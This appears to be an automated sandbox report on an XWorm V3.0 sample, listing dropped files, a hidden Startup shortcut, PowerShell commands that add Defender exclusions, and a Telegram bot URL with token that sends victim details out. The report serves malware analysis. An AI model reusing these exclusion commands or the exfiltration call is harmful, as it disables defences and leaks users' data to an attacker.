Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
QWNTSg4Fdm.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\ProgramData\QWNTSg4Fdm.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_QWNTSg4Fdm.exe_327c2118ecbb8a156ce51a79c656445a30e6eeb8_50f05828_81cd941a-cfdf-45e5-874b-8346e1fe118b\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F0.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER320.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD.tmp.dmp
|
Mini DuMP crash report, 16 streams, Tue Mar 26 17:26:40 2024, 0x1205a4 type
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bnqhgdt.ctk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2eaobaa5.yst.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xlgw1wl.nt3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyhqchz5.rpt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_frktg3e4.4mw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hclw5lyu.4dx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvdqcy0n.zbt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_klxsuqlr.r1a.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcehotju.lwa.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1fwcvcj.iis.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpgn54mj.hwh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqbhfmbn.wem.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QWNTSg4Fdm.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 26 16:23:52
2024, mtime=Tue Mar 26 16:23:52 2024, atime=Tue Mar 26 16:23:52 2024, length=152064, window=hide
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\QWNTSg4Fdm.exe
|
"C:\Users\user\Desktop\QWNTSg4Fdm.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\QWNTSg4Fdm.exe'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'QWNTSg4Fdm.exe'
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\QWNTSg4Fdm.exe'
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 4788 -s 1376
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.microsoft.coF
|
unknown
|
||
|
https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF317FDFBD80D532EB57%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro
|
149.154.167.220
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
api.telegram.org
|
149.154.167.220
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
157.254.223.19
|
unknown
|
United States
|
|
|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\QWNTSg4Fdm_RASMANCS
|
FileDirectory
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
ProgramId
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
FileId
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
LongPathHash
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
Name
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
OriginalFileName
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
Publisher
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
Version
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
BinFileVersion
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
BinaryType
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
ProductName
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
ProductVersion
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
LinkDate
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
BinProductVersion
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
Size
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
Language
|
||
|
\REGISTRY\A\{443b2797-d17c-686a-6747-fb3ccd5d769c}\Root\InventoryApplicationFile\qwntsg4fdm.exe|de375640448aa9c8
|
Usn
|
There are 23 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
12F91000
|
trusted library allocation
|
page read and write
|
|
|
|
C02000
|
unkown
|
page readonly
|
|
|
|
2FF4000
|
trusted library allocation
|
page read and write
|
|
|
|
15E2F364000
|
heap
|
page read and write
|
||
|
15E17F71000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D4000
|
trusted library allocation
|
page read and write
|
||
|
1082000
|
heap
|
page read and write
|
||
|
1E3CCE49000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1B0000
|
trusted library allocation
|
page read and write
|
||
|
15E2FAFF000
|
heap
|
page read and write
|
||
|
177E69E1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
|
1E3E50DF000
|
heap
|
page read and write
|
||
|
7DF49DFD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B100000
|
trusted library allocation
|
page read and write
|
||
|
177E5E7D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3CB2E0000
|
heap
|
page read and write
|
||
|
5D63F7D000
|
stack
|
page read and write
|
||
|
177E6C5E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B140000
|
trusted library allocation
|
page read and write
|
||
|
15E18BED000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B220000
|
trusted library allocation
|
page read and write
|
||
|
1E3CC910000
|
trusted library allocation
|
page read and write
|
||
|
177FDED8000
|
heap
|
page read and write
|
||
|
1E3CDFE3000
|
trusted library allocation
|
page read and write
|
||
|
177E6CF4000
|
trusted library allocation
|
page read and write
|
||
|
15E2F87E000
|
heap
|
page read and write
|
||
|
4C5677E000
|
stack
|
page read and write
|
||
|
1B910000
|
heap
|
page execute and read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B130000
|
trusted library allocation
|
page read and write
|
||
|
D61000
|
stack
|
page read and write
|
||
|
7FFB4B1E5000
|
trusted library allocation
|
page read and write
|
||
|
1E3DCC41000
|
trusted library allocation
|
page read and write
|
||
|
15E180DD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
|
15E2F876000
|
heap
|
page read and write
|
||
|
7DF470460000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3CC940000
|
heap
|
page readonly
|
||
|
1CB4F000
|
stack
|
page read and write
|
||
|
1E3E5216000
|
heap
|
page read and write
|
||
|
10B5000
|
heap
|
page read and write
|
||
|
15E15BA5000
|
heap
|
page read and write
|
||
|
7FFB4B130000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5540000
|
heap
|
page read and write
|
||
|
15C5000
|
heap
|
page read and write
|
||
|
177E3F6C000
|
heap
|
page read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
177E40A0000
|
trusted library allocation
|
page read and write
|
||
|
177FE127000
|
heap
|
page read and write
|
||
|
7FFB4AF56000
|
trusted library allocation
|
page read and write
|
||
|
4C57989000
|
stack
|
page read and write
|
||
|
4C56B36000
|
stack
|
page read and write
|
||
|
7FFB4AE83000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E15890000
|
heap
|
page read and write
|
||
|
177E4030000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page execute and read and write
|
||
|
177E6B90000
|
trusted library allocation
|
page read and write
|
||
|
1E3CCC10000
|
heap
|
page read and write
|
||
|
15E158B0000
|
heap
|
page read and write
|
||
|
1E3CD81E000
|
trusted library allocation
|
page read and write
|
||
|
5D63FF9000
|
stack
|
page read and write
|
||
|
1E3E4FF6000
|
heap
|
page execute and read and write
|
||
|
C00000
|
unkown
|
page readonly
|
||
|
15E18725000
|
trusted library allocation
|
page read and write
|
||
|
1C450000
|
heap
|
page read and write
|
||
|
1E3CCA42000
|
heap
|
page read and write
|
||
|
1E3CB02C000
|
heap
|
page read and write
|
||
|
1E3CAEE0000
|
heap
|
page read and write
|
||
|
7FFB4AE94000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE8D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D556BC000
|
stack
|
page read and write
|
||
|
177E6ADA000
|
trusted library allocation
|
page read and write
|
||
|
1105000
|
heap
|
page read and write
|
||
|
15E273D2000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5010000
|
heap
|
page read and write
|
||
|
7FFB4B1E8000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDA05000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B140000
|
trusted library allocation
|
page read and write
|
||
|
177FDEEE000
|
heap
|
page read and write
|
||
|
1E3E537B000
|
heap
|
page read and write
|
||
|
1E3E4FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AECB000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E15910000
|
trusted library section
|
page read and write
|
||
|
7FFB4AECD000
|
trusted library allocation
|
page execute and read and write
|
||
|
104C000
|
heap
|
page read and write
|
||
|
1E3E4FF0000
|
heap
|
page execute and read and write
|
||
|
177F5CBA000
|
trusted library allocation
|
page read and write
|
||
|
1E3CD671000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B080000
|
trusted library allocation
|
page read and write
|
||
|
1100000
|
heap
|
page read and write
|
||
|
177E59B1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D4000
|
trusted library allocation
|
page read and write
|
||
|
177E3F20000
|
heap
|
page readonly
|
||
|
177F5C9B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page read and write
|
||
|
1320000
|
trusted library allocation
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
177FDE87000
|
heap
|
page read and write
|
||
|
7FFB4B078000
|
trusted library allocation
|
page read and write
|
||
|
15E2F87A000
|
heap
|
page read and write
|
||
|
7FFB4B0A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEB0000
|
trusted library allocation
|
page read and write
|
||
|
15E182E1000
|
trusted library allocation
|
page read and write
|
||
|
15E17589000
|
trusted library allocation
|
page read and write
|
||
|
1E3CCA30000
|
heap
|
page read and write
|
||
|
7FFB4AEA4000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5000000
|
heap
|
page read and write
|
||
|
7FFB4B062000
|
trusted library allocation
|
page read and write
|
||
|
4C56CBE000
|
stack
|
page read and write
|
||
|
1E3CDB84000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDDFA000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5041000
|
heap
|
page read and write
|
||
|
177FE218000
|
heap
|
page read and write
|
||
|
1B31D000
|
heap
|
page read and write
|
||
|
7FFB4B1F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1E8000
|
trusted library allocation
|
page read and write
|
||
|
13E5000
|
heap
|
page read and write
|
||
|
7FFB4B1C0000
|
trusted library allocation
|
page read and write
|
||
|
1E3E52D1000
|
heap
|
page read and write
|
||
|
7FFB4B1F8000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5200000
|
heap
|
page read and write
|
||
|
1E3CEA42000
|
trusted library allocation
|
page read and write
|
||
|
1E3CB00E000
|
heap
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
15E15982000
|
heap
|
page read and write
|
||
|
7FFB4B1B3000
|
trusted library allocation
|
page read and write
|
||
|
1E3DCC93000
|
trusted library allocation
|
page read and write
|
||
|
177E4105000
|
heap
|
page read and write
|
||
|
7FF428900000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B120000
|
trusted library allocation
|
page read and write
|
||
|
15E1841E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE84000
|
trusted library allocation
|
page read and write
|
||
|
177E77D6000
|
trusted library allocation
|
page read and write
|
||
|
7DF477310000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D552F9000
|
stack
|
page read and write
|
||
|
7FFB4B062000
|
trusted library allocation
|
page read and write
|
||
|
177E65B6000
|
trusted library allocation
|
page read and write
|
||
|
15E2F7B0000
|
heap
|
page read and write
|
||
|
5D63E7E000
|
stack
|
page read and write
|
||
|
1E3CCC9D000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AEC0000
|
trusted library allocation
|
page read and write
|
||
|
15E15AE0000
|
trusted library allocation
|
page read and write
|
||
|
15E159CE000
|
heap
|
page read and write
|
||
|
177F5CA0000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5131000
|
heap
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
177E5940000
|
heap
|
page execute and read and write
|
||
|
1E3CD0ED000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE9B000
|
trusted library allocation
|
page read and write
|
||
|
1E3CEA3D000
|
trusted library allocation
|
page read and write
|
||
|
177E723E000
|
trusted library allocation
|
page read and write
|
||
|
177E778C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B0E0000
|
trusted library allocation
|
page read and write
|
||
|
15E2FB91000
|
heap
|
page read and write
|
||
|
4D5628D000
|
stack
|
page read and write
|
||
|
1CB8E000
|
heap
|
page read and write
|
||
|
1E3E5002000
|
heap
|
page read and write
|
||
|
15E159B2000
|
heap
|
page read and write
|
||
|
4C56DBC000
|
stack
|
page read and write
|
||
|
15E2FBE6000
|
heap
|
page read and write
|
||
|
5D6423E000
|
stack
|
page read and write
|
||
|
1E3CDCDF000
|
trusted library allocation
|
page read and write
|
||
|
15E2FB72000
|
heap
|
page read and write
|
||
|
177FE1A4000
|
heap
|
page read and write
|
||
|
1E3E52DB000
|
heap
|
page read and write
|
||
|
15E15930000
|
trusted library allocation
|
page read and write
|
||
|
7DF49DFE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1000000
|
heap
|
page read and write
|
||
|
7FFB4B090000
|
trusted library allocation
|
page read and write
|
||
|
1D38C000
|
stack
|
page read and write
|
||
|
7FFB4B1C3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1EC000
|
trusted library allocation
|
page read and write
|
||
|
15E15B30000
|
heap
|
page execute and read and write
|
||
|
177E77D1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B03A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
|
4C56977000
|
stack
|
page read and write
|
||
|
1E3DCC21000
|
trusted library allocation
|
page read and write
|
||
|
15E18481000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B190000
|
trusted library allocation
|
page read and write
|
||
|
111F000
|
heap
|
page read and write
|
||
|
7FFB4AF46000
|
trusted library allocation
|
page read and write
|
||
|
177FE0D5000
|
heap
|
page read and write
|
||
|
7FFB4B2E6000
|
trusted library allocation
|
page read and write
|
||
|
177E6AA9000
|
trusted library allocation
|
page read and write
|
||
|
1CF50000
|
heap
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
1E3E5047000
|
heap
|
page read and write
|
||
|
7FFB4B170000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B022000
|
trusted library allocation
|
page read and write
|
||
|
5D639C3000
|
stack
|
page read and write
|
||
|
5D63CFE000
|
stack
|
page read and write
|
||
|
7FFB4B28A000
|
trusted library allocation
|
page read and write
|
||
|
3005000
|
trusted library allocation
|
page read and write
|
||
|
1E3CCBF0000
|
heap
|
page execute and read and write
|
||
|
304B000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDEC6000
|
trusted library allocation
|
page read and write
|
||
|
177FDE00000
|
heap
|
page read and write
|
||
|
3003000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B150000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5366000
|
heap
|
page read and write
|
||
|
7FFB4B074000
|
trusted library allocation
|
page read and write
|
||
|
15E2765A000
|
trusted library allocation
|
page read and write
|
||
|
177E3FB6000
|
heap
|
page read and write
|
||
|
15E27391000
|
trusted library allocation
|
page read and write
|
||
|
177FE142000
|
heap
|
page read and write
|
||
|
7FFB4B0F0000
|
trusted library allocation
|
page read and write
|
||
|
1E3CB0D0000
|
heap
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
15E2F882000
|
heap
|
page read and write
|
||
|
15E2FC0E000
|
heap
|
page read and write
|
||
|
1BF5E000
|
stack
|
page read and write
|
||
|
1353000
|
trusted library allocation
|
page read and write
|
||
|
4D551F7000
|
stack
|
page read and write
|
||
|
4D5610C000
|
stack
|
page read and write
|
||
|
7FFB4B170000
|
trusted library allocation
|
page read and write
|
||
|
1E3CE56C000
|
trusted library allocation
|
page read and write
|
||
|
1E3CB058000
|
heap
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
15E159AE000
|
heap
|
page read and write
|
||
|
1E3DCF2A000
|
trusted library allocation
|
page read and write
|
||
|
15E19160000
|
trusted library allocation
|
page read and write
|
||
|
1E3CDB88000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B2C0000
|
trusted library allocation
|
page read and write
|
||
|
1D78C000
|
stack
|
page read and write
|
||
|
4D5527D000
|
stack
|
page read and write
|
||
|
177FDEF8000
|
heap
|
page read and write
|
||
|
177E6CC1000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AE90000
|
trusted library allocation
|
page read and write
|
||
|
15E159B0000
|
heap
|
page read and write
|
||
|
15E182C8000
|
trusted library allocation
|
page read and write
|
||
|
1E3CCC21000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4AEB2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1EC000
|
trusted library allocation
|
page read and write
|
||
|
1E3E52EB000
|
heap
|
page read and write
|
||
|
7FFB4B2B0000
|
trusted library allocation
|
page read and write
|
||
|
15E2FC63000
|
heap
|
page read and write
|
||
|
15E2764B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF50000
|
trusted library allocation
|
page read and write
|
||
|
1E3E5374000
|
heap
|
page read and write
|
||
|
1E3CC950000
|
trusted library allocation
|
page read and write
|
||
|
1E3CB053000
|
heap
|
page read and write
|
||
|
7FFB4B160000
|
trusted library allocation
|
page read and write
|
||
|
2F91000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF3C000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E15B40000
|
heap
|
page read and write
|
||
|
7FFB4AEDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
15E158F0000
|
heap
|
page read and write
|
||
|
15E2F86E000
|
heap
|
page read and write
|
||
|
1E3E524C000
|
heap
|
page read and write
|
||
|
1E3CDE33000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B070000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB58000
|
heap
|
page read and write
|
||
|
7FFB4B050000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E2F9D0000
|
heap
|
page read and write
|
||
|
177FE194000
|
heap
|
page read and write
|
||
|
7FFB4AF36000
|
trusted library allocation
|
page read and write
|
||
|
4D5608E000
|
stack
|
page read and write
|
||
|
177E7217000
|
trusted library allocation
|
page read and write
|
||
|
15E2FBDA000
|
heap
|
page read and write
|
||
|
1E3E5050000
|
heap
|
page read and write
|
||
|
7FFB4AEAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
177E7132000
|
trusted library allocation
|
page read and write
|
||
|
15E2F872000
|
heap
|
page read and write
|
||
|
7FFB4B140000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AF66000
|
trusted library allocation
|
page execute and read and write
|
||
|
177E5990000
|
heap
|
page execute and read and write
|
||
|
4C56879000
|
stack
|
page read and write
|
||
|
7FFB4B1B3000
|
trusted library allocation
|
page read and write
|
||
|
1E3CAFF5000
|
heap
|
page read and write
|
||
|
7FFB4B210000
|
trusted library allocation
|
page read and write
|
||
|
1E3CD889000
|
trusted library allocation
|
page read and write
|
||
|
4C56E3E000
|
stack
|
page read and write
|
||
|
7FFB4B0E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4AFA5000
|
trusted library allocation
|
page execute and read and write
|
||
|
15E2F862000
|
heap
|
page read and write
|
||
|
7FFB4B2F0000
|
trusted library allocation
|
page read and write
|
||
|
15E159F7000
|
heap
|
page read and write
|
||
|
1CF48000
|
stack
|
page read and write
|
||
|
7FFB4B2D6000
|
trusted library allocation
|
page read and write
|
||
|
177E69B5000
|
trusted library allocation
|
page read and write
|
||
|
1CB50000
|
heap
|
page read and write
|
||
|
15E2FBDD000
|
heap
|
page read and write
|
||
|
177E72FF000
|
trusted library allocation
|
page read and write
|
||
|
4D5638C000
|
stack
|
page read and write
|
||
|
15E1782D000
|
trusted library allocation
|
page read and write
|
||
|
